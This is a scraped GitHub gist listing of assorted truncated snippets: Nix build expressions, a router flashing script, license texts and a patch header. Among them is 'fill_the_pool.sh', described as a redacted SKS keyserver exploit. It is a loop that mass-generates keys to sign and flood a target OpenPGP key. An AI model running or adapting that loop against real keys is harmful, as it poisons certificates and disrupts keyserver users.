Skip to content

Instantly share code, notes, and snippets.

View lukateras's full-sized avatar
🖤
Power to *you* <:

Luka Teras lukateras

🖤
Power to *you* <:
View GitHub Profile
#include <iostream>
#include <string>
using namespace std;
unsigned int hashLength32(string hash) {
return (hash.length() * 8 - 1) / 5 + 1;
}
// omitted: E O U T
#!/bin/sh
# First, open Advanced Networking app and set static 192.168.1.10/24 IP address
# to the Ethernet interface you're going to use below. To activate network boot,
# hold router's reset button for 5 seconds.
if [ -z "$2" ]; then
echo "Usage: $0 <if> <fw>"
exit 1
fi
{ pkgs, ... }:
{
service.hydra.package = with pkgs; hydra.overrideAttrs (super: {
patches = [ (fetchpatch {
url = "https://gist.githubusercontent.com/yegortimoshenko/6d78a4fbc7b5b21234d298b3ce53ea68/raw/4193a6e9b280582a1b1265095734ece333d6719b/hydra-no-restrict-eval.diff";
sha256 = "16gwlsr6azwxj9q0b38kkb52xwc2h7ncahymdkdcrm8046naxj6k";
}) ];
});
}
@lukateras
lukateras / fill_the_pool.sh
Last active December 13, 2020 16:38
Redacted SKS exploit that was sent to me by attacker behind https://news.ycombinator.com/item?id=20312826
for _ in {1..500}; do
for _ in {1..100}; do
gpg --gen-key --batch keygen
gpg --quick-sign-key -u Marc EC18257DB21746FC711054BEB19C61D61333360C
rm ~/.gnupg/private-keys-v1.d/*.key
done
rm ~/.gnupg/openpgp-revocs.d/*.rev
gpg -a --export > ~/Desktop/keyblock.asc
with import <nixpkgs> {};
stdenv.mkDerivation rec {
name = "cloudi-${version}";
version = "1.7.5";
src = fetchzip {
url = "https://osdn.net/dl/cloudi/${name}.tar.gz";
sha256 = "0aj0rwzfyad99gnm27km705ba46nsdy1ww87qgk3cfpi0017wx86";
};
{ pkgs ? import ./pkgs.nix {} }:
with pkgs.pkgsStatic;
let
fetchCargo = callPackage <nixpkgs/pkgs/build-support/rust/fetchcargo.nix>;
rustBeta = with buildPackages; rust.packages.stable.overrideScope' (final: previous: {
cargo = (previous.cargo.override {
inherit (rust.packages.stable) rustPlatform;

Redistribution and use in any form, with or without modification, are permitted.

As far as the law allows, this software comes as is, without any warranty or condition, and no contributor will be liable to anyone for any damages related to this software or this license, under any kind of legal claim.

image: nixos/nix
build:
stage: build
script: nix-build

Permission to use, copy, modify, and/or distribute this software for any purpose with or without fee is hereby granted.

The software is provided "as is" and the author disclaims all warranties with regard to this software including all implied warranties of merchantability and fitness. In no event shall the author be liable for any special, direct, indirect, or consequential damages or any damages whatsoever resulting from loss of use, data or profits, whether in an action of contract, negligence or other tortious action, arising out of or in connection with the use or performance of this software.

From d40139f566baac932b275167eb5b6ae4ac3cc64c Mon Sep 17 00:00:00 2001
From: Yegor Timoshenko <yegortimoshenko@riseup.net>
Date: Fri, 13 Mar 2020 00:54:03 +0300
Subject: [PATCH] azure: pass AZURE_CLIENT_SECRET_FILE to autorest.Authorizer
---
providers/dns/azure/azure.go | 1 +
1 file changed, 1 insertion(+)
diff --git a/providers/dns/azure/azure.go b/providers/dns/azure/azure.go